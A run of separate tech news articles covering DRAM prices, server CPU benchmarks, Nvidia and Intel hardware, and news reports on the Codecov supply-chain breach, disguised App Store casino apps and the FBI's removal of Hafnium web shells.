More bad news for the prospective PC builder comes out of Taiwanese research institute TrendForce, which is predicting a rise in DRAM prices of between 18 and 23% for the second quarter of 2021.
While negotiations between OEMs and resellers are still ongoing, TrendForce is predicting a quarter-on-quarter price increase of 25% on 8GB DDR4 2666MHz modules, higher than expected. DRAM modules continue to be in short supply, partly due to the global chip shortage, and partly thanks to many people buying new machines to work from home during the pandemic. All kinds of RAM are affected, from mobile DRAM, GDDR modules for graphics cards, and server DRAM, which is closely related to home PC RAM and therefore more easily affected by price rises.
The second quarter of the financial year is often the peak season for laptop production, and TrendForce’s figures predict a 7.9% increase in the manufacture of laptops by major manufacturers this year, which will put more pressure on supplies of RAM and increase the price by 23 – 28% in 2Q21.
And the worst thing is it’s all likely to carry on this way for some time. Server RAM, under pressure thanks to a boom in cloud computing linked to the pandemic, will see another rise in demand, putting manufacturers in an advantageous position as they negotiate with the AIB makers. The price of server RAM could rise by 25% next quarter, TrendForce forecasts.
AMD’s EPYC Milan processors launched last month with 120 new world records to their credit in various applications, like HPC, Cloud, and enterprise workloads. But variants of these chips will eventually come to the market as Threadripper models for high end desktop PCs, and AMD’s server records don’t tell us too much about what we could expect from the PC chips. However, the company recently broke the Cinebench world record with its Milan chips, giving us an idea of what to expect in rendering work. Just for fun, we also ran a few tests on Intel’s new flagship 40-core Ice Lake Xeon chips to see how they stack up against not only AMD’s new record it set with the server chips, but also a single AMD Threadripper processor.
During the latest episode of AMD’s The Bring Up YouTube video series, the company took two of its $7,980 EPYC Milan 7763 chips for a spin in Cinbench R23, a rendering application that AMD commonly uses for its desktop PC marketing (largely because it responds exceedingly well to AMD’s Zen architectures).
As a quick reminder, AMD’s flagship 7763 server chips come armed with the 64 Zen 3 cores and 128 threads apiece and have a 2.45 GHz base and 3.5 GHz boost frequency. All told, we’re looking at a Cinebench run with 128 cores and 256 threads, which you can see in the tweet below:
So sieht das aus, wenn sich 2x 64 Zen-3-Kerne durch den Cinebench R23 fressen. pic.twitter.com/o9jiZeKPlRApril 15, 2021
See more
The dual 7763’s scored 113,631 points, while the previous world record weighed in at 105,570 (as per HWBot rankings). AMD says it used a reference server design with conventional air cooling for the test run, so there were no special accommodations or overclocking. The system peaked at 85C and 403W during the test run. Here’s AMD’s official HWBot world record submission.
1K Unit Price / RCP
Cores / Threads
Base / Boost – All Core (GHz)
L3 Cache (MB)
TDP (W)
AMD EPYC Milan 7763
$7,890
64 / 128
2.45 / 3.5
256
280
Intel Xeon Platinum 8380
$8,099
40 / 80
2.3 / 3.2 – 3.0
60
270
That isn’t much info to work with, but it’s enough for us to set up our own test. We ran a few tests with a dual Xeon 8380 Ice Lake Xeon server we used for our recent review. Much like AMD’s test system, this is a standard development design with air cooling (more details in the review). The Xeon system houses two $8,099 10nm Ice Lake Xeons with 40 cores 80 threads apiece that operate at a 2.3 GHz base and 3.2 GHz boost frequency. Yes, AMD’s Milan outweighs the Xeon system, but the Ice Lake 8380 is Intel’s highest-end part, and both chips come with comparable pricing.
We’re looking at the EPCY Milan server with 128 cores and 256 threads against the Intel Ice Lake system with 80 cores and 160 threads. Our quick tests here are not 100% like-for-like so take these with a grain of salt, though we did our best to match AMD’s test conditions. Here are our test results, with a few extras from the HWBot benchmark database mixed in:
Cinebench Benchmarks
Score
Cooling
Chip Price
2x AMD EPYC Milan 7763
113,631
Air
$15,780
1x Threadripper 3990X (Splave)
105,170
Liquid Nitrogen (LN2)
$3,990
2x EPYC 7H12
92,357
Air
?
2x Intel Xeon Platinum 8380
74,630
Air
$17,000
1x Threadripper 3990X (stock)
64,354
All-In-One (AIO) Liquid Cooling
$3,990
As you can see, in Cinebench R23, the dual EPYC Milan 7763’s are 34% faster than the dual Ice Lake Xeon 8380’s. AMD lists a 403W peak power consumption during its tests, but we assume those measurements are for the processors only (and perhaps only a single processor). In contrast, our power measurement at the wall for the Xeon 8380 server weighed in at 1154W, but that includes a beastly 512GB of memory, other platform additives, and VRM losses, etc., meaning it’s just a rough idea of power consumption that isn’t comparable to the EPYC system.
Naturally, Cinebench R23 results have absolutely no bearing on the purchasing decision for a data center customer, but it is an interesting comparison. Notably, a single Threadripper 3990X, when pressed to its fullest with liquid nitrogen by our resident overclocking guru Splave, still beats the two Xeon Platinum 8380’s, though the 8380’s pull off the win against an air-cooled 3990X at stock settings (measured in our labs).
Finally, we decided to see how two Ice Lake Xeon 8380’s compare against a broader set of processors. Intel suffered quite a bit of embarrassment back at AMD’s launch of the 64-core Threadripper 3900X for high-end desktop PCs, as this $3,990 processor (yes, just one) beat two of Intel’s previous-gen 8280 Xeons in a range of threaded workloads. Intel’s Xeon’s weighed in at $20,000 total and represented the company’s fastest server processors. Ouch.
In fact, those benchmark results were so amazing that we included an entire page of testing in our Threadripper 3990X review comparing two of Intel’s fire-breathing behemoths to AMD’s single workstation chip, which you can see here. As a bit of a redux, we decided to revisit the standings with a quick run of Cinebench R20 with the new Intel 10nm Xeons. Notably, this test is with an older version of the benchmark than we used above, but that’s so we can match our historical data in the chart below:
Unfortunately, we don’t have a dual-socket EPYC Milan 7763 system to add to our historical test results here, but we get a good enough sense of Ice Lake’s relative positioning with this chart. The two Intel Ice Lake 8380’s, which weigh in at $17,000, beat the single $3,990 Threadripper 3900X at stock settings. That’s at least better than the dual 8280’s that lost so convincingly in the past.
However, a quick toggle of the PBO switch, which is an automated overclocking feature from AMD that works with standard cooling solutions (no liquid nitrogen required), allows a single Threadripper 3990X to regain the lead over Intel’s newest 10nm flagships in this test. Intel’s latest chips also can’t beat AMD’s previous-gen EPYC Rome 7742’s, which are 64-core chips.
Of course, this single benchmark has almost no bearing on the enterprise market that the Ice Lake chips are destined for, and the latest Xeon’s do make solid steps forward in a broader range of tests that do matter, which you can see in our Ice Lake 8380 review.
Federal officials are investigating a security breach at software auditing company Codecov, which apparently went undetected for months, Reuters reported. Codecov’s platform is used to test software code for vulnerabilities, and its 29,000 clients include Atlassian, Proctor & Gamble, GoDaddy, and the Washington Post.
In a statement on the company’s website, Codecov CEO Jerrod Engelberg acknowledged the breach and the federal investigation, saying someone had gained access to its Bash Uploader script and modified it without the company’s permission.
“Our investigation has determined that beginning January 31, 2021, there were periodic, unauthorized alterations of our Bash Uploader script by a third party, which enabled them to potentially export information stored in our users’ continuous integration (CI) environments,” Engelberg wrote. “This information was then sent to a third-party server outside of Codecov’s infrastructure.”
According to Engelberg’s post, the modified version of the tool could have affected:
Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the Bash Uploader script was executed.
Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys.
The git remote information (URL of the origin repository) of repositories using the Bash Uploaders to upload coverage to Codecov in CI.
Although the breach occurred in January, it was not discovered until April 1st, when a customer noticed something was wrong with the tool. “Immediately upon becoming aware of the issue, Codecov secured and remediated the potentially affected script and began investigating the extent to which users may have been impacted,” Engelberg wrote.
Codecov does not know who was responsible for the hack, but has hired a third-party forensics company to help it determine how users were affected, and reported the matter to law enforcement. The company emailed affected users, who Codecov did not name, to notify them.
“We strongly recommend affected users immediately re-roll all of their credentials, tokens, or keys located in the environment variables in their CI processes that used one of Codecov’s Bash Uploaders,” Engelberg added.
While the breadth of the Codecov breach remains unclear, Reuters notes that it could potentially have a similar, far-reaching impact as the SolarWinds hack of late last year. In that breach, hackers associated with the Russian government compromised SolarWinds’ monitoring and management software. Some 250 entities are believed to have been affected by the SolarWinds breach including Nvidia, Cisco, and Belkin. The US Treasury, Commerce, State, Energy, and Homeland Security agencies were also affected.
Blink, the Kickstarter success bought by Amazon in 2017, has long been synonymous with inexpensive battery-powered home video cameras that don’t require a monthly contract for cloud recordings. Open-source projects like Homebridge, Home Assistant, and HOOBS have made the cameras even more extensible by allowing Blink’s temperature and motion sensors to work with smart home platforms like HomeKit and act as triggers for various automations. This combination of price and functionality led many smart home enthusiasts to buy Blink cameras in bulk for whole-home monitoring, especially those who don’t want to be beholden to a corporate overlord (and its requisite subscription fees). But instead of embracing its most passionate fans, Amazon has turned against them, threatening to terminate Blink accounts while challenging the very concept of ownership.
To set the stage, I recently set up a Raspberry Pi running Homebridge with the goal of creating a single iPhone dashboard to tie my smart home together. I started automating my home about 12 years ago, long before you could buy into complete ecosystems from Amazon, Google, and Apple. Now it’s a devil’s brew of Z-Wave and Zigbee devices, some controllable with Siri, some with Alexa, and a few with Google Assistant. It’s held together with a smattering of IFTTT recipes and four disparate hubs from Ikea, Aqara, Philips Hue, and Vera. It works, kind of, but requires several different apps, many interfaces, and lots of patience, especially from my family.
Over most of a weekend, I was able to configure Homebridge to link every one of my 50+ smart devices to HomeKit and each other in the Apple Home app. This allowed me to create rules that were previously impossible, like using the Blink XT camera’s motion sensor in my garden to trigger a Z-Wave siren and Hue lightbulbs at night. Nerdvana unlocked!
My sense of delight and intense pride lasted exactly one week before my Blink cameras suddenly went dead. The reason was delivered in an email from Amazon the next morning:
“My name is Tori and I am with the Blink team. While doing a routine server audit, your account was flagged and subsequently disabled due to unsupported scripts or apps running on your system. The only automation that is permitted for use with the Blink system is through Alexa and/or IFTTT. Please disable these scripts or apps and reach back out to me so that I can re-enable your account.”
After a brief WTF exchange whereby I explained that Alexa and / or IFTTT are wholly inferior to the capabilities of Homebridge, Tori helpfully directed me to the exact paragraph of the Blink Terms of Service that I had violated. Terms which, admittedly, I was now reading for the first time (emphasis mine):
“We may terminate the Agreement or restrict, suspend, or terminate your use of Blink Services at our discretion without notice at any time, including if we determine that your use violates the Agreement, is improper, substantially exceeds or differs from normal use by other users, or otherwise involves fraud or misuse of Blink Services or harms our interests or those of another user of Blink Services. If your use of Blink Services is restricted, suspended, or terminated, you may be unable to access your video clips and you will not receive any refund or any other compensation. In case of termination, Blink may immediately revoke your access to Blink Services without refund.”
It turns out that Amazon’s crackdown on Blink automators has been a known issue in the community for at least a year. My question is: why does Amazon bother?
My Homebridge integration may well be in violation of Blink’s terms and conditions, even if the terms seem unduly restrictive. But why is Amazon, owner of those massive AWS server farms that earned nearly $50 billion in 2020, resorting to such draconian measures in response to my meager deployment of five Blink cameras? I could see a crackdown on large-scale corporate installations hammering away at the Blink API, but why me and other small-time enthusiasts?
According to Colin Bendell, developer of the Blink camera plugin for Homebridge, there are at most 4,000 homes using open-source plugins like his. “Even if we round up to 10,000 users, I think this is probably small potatoes for Amazon,” says Bendell, who should know. Not only did he reverse engineer the Blink app to mimic its behavior, but the O’Reilly author and self-proclaimed IoT hobbyist is also the director of performance engineering at Shopify.
Blink could easily look the other way for small home deployments like mine without waving its rights. It says so right in the T&Cs it sent me:
“Blink’s failure to insist upon or enforce your strict compliance with this Agreement will not constitute a waiver of any of its rights.”
But that’d be a cop out. Really, Amazon should be embracing Blink hobbyists. Homebridge is, after all, a project that extends Apple HomeKit to work with a wide variety of uncertified devices including cameras and doorbells from Amazon-owned Ring. And study after study have concluded that Apple device owners love to spend money. Surely this is a community Amazon should encourage, not vilify.
At the risk of saying too much (please don’t shut me down, Amazon!), why is it that my two Ring cameras aren’t raising any red flags during “server audits”? I certainly check them more frequently as one is my doorbell. Perhaps it’s because I already pay a monthly subscription to Amazon for Ring and pay nothing to Blink. (Although sadly, even that early benefit has come to an end. As of March 18th, Amazon requires owners of newer Blink cameras to pay a subscription fee to unlock every feature.)
When I reached out to Amazon with the questions I raise above, and asked if enthusiast initiatives like Homebridge would be officially (or unofficially, wink) supported, I was given this boilerplate response:
“Blink customers can control their cameras through the Blink Home Monitor app, and customize their experience using the If This Then That (IFTTT) service. We are always looking for ways to improve the customer experience, including supporting select third-party integrations for our devices.”
Gee, thanks.
We kid ourselves about ownership all the time. I say I own my house, but, in fact, the bank owns more of it than I do. I listen to mymusic on Spotify, but those Premium playlists I’ve so carefully curated for years will be plucked from my phone just as soon as payments lapse. But somehow, Blink cameras were supposed to be different. They were for people drawn to Blink on the strength of that “no monthly contract” pitch. These were devices you were supposed to own without limitations or tithes.
How things have changed.
In 2017, Blink stood alone in the field; today there’s Wyze, Eufy, TP-Link / Kasa, Imou, and Ezviz to name just a few of the companies making inexpensive wired and wireless cameras for every smart home ecosystem, including Amazon’s, often with better features and value.
I’ve been a smart home evangelist for more than a decade, doling out advice to friends, often solicited, often not. Blink used to be an easy pitch: cheap and dead simple to install for normies, and highly extensible if you’re willing to put in the effort. But Amazon’s heavy-handed enforcement of T&Cs alongside the introduction of subscription fees have negated any advantage Blink once held over its camera competitors. While Blink sales will undoubtedly benefit from Amazon’s promotion machine, longtime Blink enthusiasts like myself will be taking their allegiances elsewhere.
HBM stands for high bandwidth memory and is a type of memory interface used in 3D-stacked DRAM(dynamic random access memory) in some AMD GPUs(aka graphics cards), as well as the server, high-performance computing (HPC) and networking and client space. Samsung and SK Hynix make HBM chips.
Ultimately, HBM is meant to offer much higher bandwidth, lower power consumption compared to the GDDR memory used in most of today’s best graphics cards for gaming.
HBM Specs
HBM2 / HBM2E (Current)
HBM
HBM3 (Upcoming)
Max Pin Transfer Rate
3.2 Gbps
1 Gbps
?
Max Capacity
24GB
4GB
64GB
Max Bandwidth
410 GBps
128 GBps
512 GBps
HBM technology works by vertically stacking memory chips on top of one another in order to shorten how far data has to travel, while allowing for smaller form factors. Additionally, with two 128-bit channels per die, HBM’s memory bus is much wider than that of other types of DRAM memory.
Stacked memory chips are connected through through-silicon vias (TSVs) and microbumps and connect to GPU via the interposer, rather than on-chip.
HBM2 and HBM2E
HBM2 debuted in 2016, and in December 2018, the JEDEC updated the HBM2 standard. The updated standard was commonly referred to as both HBM2 and HBM2E (to denote the deviation from the original HBM2 standard). However, the spec was updated again in early 2020, and the name “HBM2E” wasn’t formally included. However, you may still see people and/or companies refer to HBM2 as HBM2E or even HBMnext, thanks to Micron.
The current HBM2 standard allows for a bandwidth of 3.2 GBps per pin with a max capacity of 24GB per stack (2GB per die across 12 dies per stack) and max bandwidth of 410 GBps, delivered across a 1,024-bit memory interface separated by 8 unique channels on each stack.
Originally, HBM2 was specced for a max transfer rate of 2 GBps per pin, a max capacity of 8GB per stack (1GB max die capacity across 8 dies per stack) and max bandwidth of 256 GBps. It was then bumped to 2.4 Gbps per pin and a max capacity of 24GB (2GB per die across 12 dies per stack) and a 307 Gbps max bandwidth before reaching the standard we see today.
HBM3
While not yet available, the HBM3 standard is currently in discussion and being standardized by JEDEC.
According to an Ars Technica report, HBM3 is expected to support up to 64GB capacities and a bandwidth of up to 512 GBps. In 2019, Jeongdong Choe, an analyst at TechInsights, pointed to HBM3 supporting 4 Gbps transfer rates in an interview with Semiconductor Engineering. HBM3 will also reportedly deliver more dies per stack and more than two times the density per die with a similar power budget. In a 2020 blog post, Cadence reported that the spec will use a 512-bit bus with higher clocks, allowing HBM3 to “achieve the same higher bandwidth with much lower cost by not requiring a silicon interposer.”
We don’t know the release date of HBM3 yet; however, this April we saw SiFive tape out a system-on-chip (SoC) with HBM3.
This article is part of the Tom’s Hardware Glossary.
In popular culture, access to an illicit gambling den is as easy as stumbling into the right shop and saying the password — or greasing some palms. Apple’s App Store apparently has a real-life parallel: today, app developer Kosta Eleftheriou discovered a terrible kiddie game that’s actually a front for gambling websites.
The secret password isn’t one you’d be likely to guess: you have to be in the right country —or pretend to be in the right country using a VPN.
But then, instead of launching an ugly monkey-flipping endless runner game filled with typos and bugs, the very same app launches a casino experience:
This @AppStore app pretends to be a silly platformer game for children 4+, but if I set my VPN to Turkey and relaunch it becomes an online casino that doesn’t even use Apple’s IAP.
pic.twitter.com/crnOOF0pNi
— Kosta Eleftheriou (@keleftheriou) April 15, 2021
The app, “Jungle Runner 2k21,” has already disappeared from the App Store, presumably thanks to publicity from Gizmodo and Daring Fireball, who each wrote about Eleftheriou’s finding earlier today.
It’s not the only one, though: the same developer, “Colin Malachi,” had another incredibly basic game on the App Store called “Magical Forest – Puzzle” that was also a front for gambling. I tried them both myself, and here’s some visual evidence:
Here’s what Magical Forest looked like when you opened it from the United States:
I accessed them from a VPN server in Turkey; While Daring Fireball notes that users in other non-US countries like Italy also seem to have been able to access the gambling sites, I tried them with a number of other locations including Italy without success.
Unlike the multi-million dollar App Store scams that Eleftheriou uncovered earlier this year, it’s not hard to see why Apple’s App Store review program might have missed these — they largely look like your typical shovelware if you don’t know the trick, with only a handful of tells… like the fact that Jungle Runner uses a Pastebin for its privacy policies:
It’s not necessarily clear to me that they’d be violating very many of Apple’s App Store policies, either. Gambling apps are permitted by Apple, as long as they’re geo-restricted to regions where that gambling is permitted by law, and you could maybe argue that’s exactly what this developer did by checking your IP address. But I imagine Cupertino would frown on a gambling app masquerading as a kid’s game either way — and Eleftheriou suggests the gambling sites may be scamming people out of money, too.
As an icing on the cake, people in the reviews say that they deposited large sums for the promise of a bonus, but they never received the promised payouts.
Surprising no one, the scammers aren’t even operating a fair casino.
— Kosta Eleftheriou (@keleftheriou) April 15, 2021
Apple didn’t immediately reply to a request for comment.
Parallels has released a new version of its Parallels Desktop for Mac virtualization software that features full native support for Mac computers equipped with either Apple M1 or Intel processors. The program allows users to run Windows 10 Arm Insider Preview as well as various Linux distributions on systems running the M1 SoC at native speeds.
Running Windows on Apple’s Mac computers may not be a priority for most of their owners, but there are still quite a lot of users who need to run Windows applications from time to time. Since the latest Apple MacBook Air/Pro 13 and MacMini are based on the Arm-powered M1 SoC, it’s impossible to install regular Windows 10 as the second OS on them. Furthermore, unlike other programs for Mac, virtualization machines did not run well on M1-based Macs via the Rosetta layer, so Parallels had to redesign its Parallels Desktop to make it run on an Apple’s M1 SoC natively.
Parallels Desktop for Mac 16.5 supports all the capabilities that that users of PDM are used to on Apple M1 systems, including coherence mode, shared profile, and touch bar controls, just to name a few.
In addition to Windows 10 for Arm, Parallels Desktop for Mac 16.5 also supports guest operating systems on M1 Macs,including Linux distributives Ubuntu 20.04, Kali Linux 2021.1, Debian 10.7, and Fedora Workstation 33-1.2.
To ensure flawless operation of its Parallels Desktop for Mac virtual machine, Parallel used help of more than 100,000 Mac M1 users who ran Microsoft’s Windows 10 on Arm Insider Preview along with various software from PowerBI to Visual Studio and from SQL server to Meta Trader. In addition, engineers from Parallels did not forget games and ensured that titles like Rocket League, Among Us, Roblox, The Elder Scrolls V: Skyrim, and Sam & Max Save the World worked well on Parallels Desktop for Mac 16.5 and Apple M1-powered systems.
Right now, Parallels Desktop for Mac 16.5 is good enough to launch it commercially, according to the company.
There are some interesting findings about performance of Apple M1 and Parallels Desktop 16.5 for Mac:
An M1-based Mac running Parallels Desktop 16.5 and Windows 10 Arm consumes 2.5 times less energy than a 2020 Intel-based MacBook Air.
An Apple M1 machine running Parallels Desktop 16.5 and Windows 10 Arm performs 30% better in Geekbench 5 than a MacBookPro with Intel Core i9-8950HK in the same conditions.
Apple M1’s integrated GPU appears to be 60% faster than AMD’s Radeon Pro 555X discrete graphics processor in DirectX 11 applications when running Windows using the Parallels Desktop 16.5.
“Apple’s M1 chip is a significant breakthrough for Mac users,” said Nick Dobrovolskiy, Parallels Senior Vice President of Engineering and Support. “The transition has been smooth for most Mac applications, thanks to Rosetta technology. However, virtual machines are an exception and thus Parallels engineers implemented native virtualization support for the Mac with M1 chip. This enables our users to enjoy the best Windows-on-Mac experience available.”
The Overwatch League kicks off its fourth season this week, and while the majority of matches will be played remotely, today the league announced plans to hold multiple live events in China.
There will be three events spread across three cities — Hangzhou in June, Shanghai in July, and Guangzhou in August — and the league says they will take place in venues with reduced capacity “in order to comply with local safety requirements.” The events will be something of a hybrid between online and in-person competition. Here’s how OWL describes it:
The five China-based teams — Hunters, Charge, Spark, Valiant, and Dragons — plan to travel to each of the events to compete onstage, while the three Korea-based teams — NYXL, Fusion, and Dynasty — are not expected to travel. Matches taking place between a China-based team and a Korea-based team will feature the Chinese team competing onstage while their opponent competes from Korea remotely on our cloud tournament server.
Like most esports leagues, OWL was forced to pivot last year to online competition due to the ongoing pandemic; even the championship match featured pro teams playing remotely. The change was particularly big for OWL, as the league — which features 20 squads based in 19 cities across North America, Europe, and Asia — was preparing for its first season where teams would play matches in home venues. While the majority of the 2021 season is still expected to take place remotely, today’s news is an important step for OWL getting back to its original goal.
The Overwatch League’s 2021 season begins on April 16th, with a huge slate of matches throughout the weekend.
In what’s believed to be an unprecedented move, the FBI is trying to protect hundreds of computers infected by the Hafnium hack by hacking them itself, using the original hackers’ own tools (via TechCrunch).
The hack, which affected tens of thousands of Microsoft Exchange Server customers around the world and triggered a “whole of government response” from the White House, reportedly left a number of backdoors that could let any number of hackers right into those systems again. Now, the FBI has taken advantage of this by using those same web shells / backdoors to remotely delete themselves, an operation that the agency is calling a success.
“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” explains the US Justice Department.
The wild part here is that owners of these Microsoft Exchange Servers likely aren’t yet aware of the FBI’s involvement; the Justice Department says it’s merely “attempting to provide notice” to owners that they attempted to assist. It’s doing all this with the full approval of a Texas court, according to the agency. You can read the unsealed search and seizure warrant and application right here.
It’ll be interesting to see if this sets a precedent for future responses to major hacks like Hafnium. While I’m personally undecided, it’s easy to argue that the FBI is doing the world a service by removing a threat like this — while Microsoft may have been painfully slow with its initial response, Microsoft Exchange Server customers have also now had well over a month to patch their own servers after several critical alerts. I wonder how many customers will be angry, and how many grateful that the FBI, not some other hacker, took advantage of the open door. We know that critical-but-local government infrastructure often has egregious security practices, most recently resulting in two local drinking water supplies being tampered with.
The FBI says that thousands of systems were patched by their owners before it began its remote Hafnium backdoor removal operation, and that it only removed “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.
Today is Patch Tuesday, by the way, and Microsoft’s April 2021 security update includes new mitigations for Exchange Server vulnerabilities, according to CISA. If you’re running a local Exchange Server or know someone who is, take a look.
Now that Intel has finally launched its 3rd Generation Xeon Scalable ‘Ice Lake’ processors for servers, it is only a matter of time before the company releases its Xeon W-series CPUs featuring the same architecture for workstations. Apparently, some of these upcoming processors are already in the wild evaluated by workstation vendors.
Puget Systems recently built a system based on the yet-to-be-announced Intel Xeon W-3335 processor clocked at 3.40 GHz using Gigabyte’s single-socket MU72-SU0 motherboard, 128 GB of DDR4 memory (using eight 16GB modules), and Nvidia’s Quadro RTX 4000 graphics card. Exact specifications of the CPU are unknown, but given its ’3335‘ model number, we’d speculate that this is an entry-level model. The workstation vendor is obviously evaluating the new Ice Lake platform for workstations from every angle, yet it has published a benchmark result of the machine in its PugetBench for Premiere Pro 0.95.1.
The Intel Xeon W-3335-based system scored 926 overall points (standard export: 88.2; standard live playback: 126.1; effects: 63.6; GPU score: 63.6). For comparison, a system powered by AMD’s 12-core Ryzen 5900X equipped with 16GB of RAM and a GeForce RTX 3080 scored 915 overall points (standard export: 100.9; standard live playback: 79.6; effects: 93.9; GPU score: 100.7).
Given that we do not know exact specifications of the Intel X-3335 CPU, it is hard to make any conclusions about its performance, especially keeping in mind that the platform drivers may not be ready for an Ice Lake-W. Yet, at least we can now make some assumptions about ballpark performance of the CPU.
Intel has not disclosed what to expect from its Xeon W-series ‘Ice Lake’ processors, but in general the company tends to offer key features of its server products to its workstation customers as well. In case of the Xeon W-3335 it is evident that the CPU maintained an eight-channel memory subsystem, though we do not know anything about the number of PCIe lanes it supports.
In any case, since workstation vendors are already testing the new Xeon-W CPUs, expect them to hit the market shortly.
Nvidia this week introduced a host of professional graphics solutions for desktops and laptops, which carry the Nvidia RTX A-series monikers and do not use the Quadro branding. The majority of the new units are based on the Ampere architecture and therefore bring the latest features along with drivers certified by developers of professional software.
Nvidia started to roll-out its Ampere architecture to the professional market last October when it announced the Nvidia RTX A6000 graphics card based on the GA102 GPU with 10,752 CUDA cores and 48GB of memory. The graphics board costs $4,650 and is naturally aimed at high-end workstations that cost well over $10,000. To address market segments with different needs, Nvidia this week introduced its RTX A5000 and RTX A4000 professional graphics cards.
The Nvidia RTX A5000 sits below the RTX A6000 but has the exact same feature set, including support for 2-way multi-GPU configurations using NVLink as well as GPU virtualization, so it can be installed into a server and used remotely by several clients (or used in regular desktop machines). The RTX A5000 is based the GA102 GPU and is equipped with 24GB of GDDR6 memory with ECC. The RTX A5000 peaks at 27.8 FP32 TFLOPS, which is nearly 30% below RTX A6000’s 38.7 FP32 TFLOPS, so it likely has far fewer CUDA cores. The board has four DisplayPort 1.4a outputs and comes with a dual-slot blower-type cooler.
Next up is the Nvidia RTX A4000, which is based on the GA104 and carries 16GB of GDDR6 memory with ECC. The product tops at 19.2 FP32 TFLOPS and is designed solely for good-old ‘individual’ workstations. Meanwhile, to keep up with the latest trends towards miniaturization, the RTX A4000 uses a single-slot blower-type cooling system.
Nvidia plans to start shipments of the new RTX A-series professional graphics cards later this month, so expect them in new workstations in May or June.
Mobile Workstations Get Amperes and Some Turings
In addition to new graphics cards for desktop workstation, Nvidia also rolled-out a lineup of mobile Nvidia RTX A-series GPUs that includes four solutions: the RTX A5000 and the RTX A4000 based on the GA104 silicon (just like the RTX 3070/RTX 3080 for laptops), as well as the RTX A2000 based on the GA106 chip (like the RTX 3060 for laptops).
The higher-end mobile Nvidia RTX A5000 has 6,144 CUDA cores and 16GB GDDR6, and the RTX A4000 has 5,120 CUDA cores and 8 GB GDDR6. These are essentially the mobile GeForce RTX 3080/3070, but with drivers certified by ISVs for professional applications. Performance of these GPUs tops at 21.7 FP32 and 17.8 FP 32 TFLOPS.
By contrast, the RTX A3000 with 4,096 CUDA cores and 6GB of memory seems to be a rather unique solution as it has more execution units than the GeForce RTX 3060, yet it features a similar 192-bit memory interface. As for performance, it will be up to 12.8 FP32 TFLOPS. Meanwhile, the entry-level RTX A2000 with 2,560 CUDA cores and 4GB of GDDR6 memory will offer up to 9.3 FP32 TFLOPS.
All of these GPUs are rated for a wide TGP range (e.g., the RTX A5000 can be limited to 80W or to 165W) and support Max-Q, Dynamic Boost, and WhisperMode technologies, so expect actual performance of Nvidia’s RTX A-series GPUs to vary from design to design, just like it happens with their GeForce RTX counterparts.
Nvidia expects its partners among manufacturers of mobile workstations to adopt its new RTX A-series solutions this quarter.
Some New Turings Too
In addition to new Ampere-based professional graphics solutions for desktops and laptops, Nvidia also introduced its T1200 and T600 laptop GPUs that also come with drivers certified by developers of professional applications. These products use unknown Turing silicon and are mostly designed to replace integrated graphics, so they do not feature very high performance and lack RT as well as Tensor cores.
Android’s Google Photos app is being updated with the improved video editing tools that were previously exclusive to iOS. Android Police spotted the rollout, and reports that it appears to be available for both Google Pixel devices and other Android phones. The tools appear to have arrived with a server-side update, though you can try updating to the latest version of Google Photos if they’re not yet live in your app.
As Google explained back in February, the new video editing tools include over 30 controls, covering everything from cropping, filters, and color grading options like adjusting contrast, saturation, and brightness.
The video editing tools are arriving on Android as Google’s Photos service is going through some big changes. As part of its February announcement, the company said it would be bringing some machine-learning powered editing tools previously exclusive to Pixel devices to other Android phones, but only for Google One subscribers. Next, in June, Google Photos will end its unlimited free photo storage, and will ask users to pay for storage beyond 15GB. The app is getting more powerful, but increasingly you’re having to pay for more advanced features.
As well as announcing that the iOS video editing tools would be coming to Android, in February Google also said Android’s new photo editing tools would be making their way to iOS. Google announced they’d be arriving “in the coming months,” but as of this writing they don’t appear to be live.
Nvidia introduced its Arm-based Grace CPU architecture that the company will use to power two new AI supercomputers. Nvidia says its new chips deliver 10X more performance than today’s fastest servers in AI and HPC workloads.
The new Grace CPU architecture comes powered by unspecified “next-generation” Arm Neoverse CPU cores paired with LPDDR5x memory that pumps out 500 GBps of throughput, along with a 900 GBps NVLink connection to an unspecified GPU for the leading-edge devices. Nvidia also revealed a new roadmap (below) that shows a “Grace Next” CPU coming in 2025, along with a new “Ampere Next Next” GPU that will arrive in mid-2024.
Notably, Nvidia named the Grace CPU architecture after Grace Hopper, a famous computer scientist. Nvidia is also rumored to be working on its chiplet-based Hopper GPUs, which would make for an interesting pairing of CPU and GPU codenames that we could see more of in the future.
Nvidia’s pending ARM acquisition, which is still winding its way through global regulatory bodies, has led to plenty of speculation that we could see Nvidia-branded Arm-based CPUs. Nvidia CEO Jensen Huang confirmed that was a distinct possibility, and while the first instantiation of the Grace CPU architecture doesn’t come as a general-purpose design in the socketed form factor we’re accustomed to (instead coming mounted on a board with a GPU), it is clear that Nvidia is serious about deploying its own Arm-based data center CPUs.
Nvidia hasn’t shared core counts or frequency information yet, which isn’t entirely surprising given that the Grace CPUs won’t come to market until early 2023. The company did specify that these are next-generation Arm Neoverse cores. Given what we know about Arm’s current public roadmap (slides below), these are likely the V1 Platform ‘Zeus’ cores, which are optimized for maximum performance at the cost of power and die area.
Image 1 of 3
Image 2 of 3
Image 3 of 3
Chips based on the Zeus cores will come in either 7nm or 5nm flavors and offer a 50% increase in IPC over the current Arm N1 cores. Nvidia says its Grace CPU will have plenty of performance, with a 300+ projected score in the SPECrate_2017_int_base benchmark. That’s impressive for a freshman effort — AMD’s EPYC Milan chips, the current performance leader in the data center, have posted results ranging from 382 to 424, putting Grace more on par with the 64-core AMD Rome chips. Given Nvidia’s ’10X’ performance claims relative to existing servers, it appears the company is referring to primarily GPU-driven workloads.
The Arm V1 platform supports all the latest high-end tech, like PCIe 5.0, DDR5, and either HBM2e or HBM3, along with the CCIX 1.1 interconnect. It appears that, at least for now, Nvidia is utilizing its own NVLink instead of CCIX to connect its CPU and GPU.
As we can see above, the first versions of the Nvidia Grace CPU will come mounted as a BGA package (meaning it won’t be a socketed part like traditional x86 server chips) and comes flanked by what appear to be eight packages of LPDDR5x memory. Nvidia says that LPDDR5x ECC memory provides twice the bandwidth and 10x better power efficiency over standard DDR4 memory subsystems.
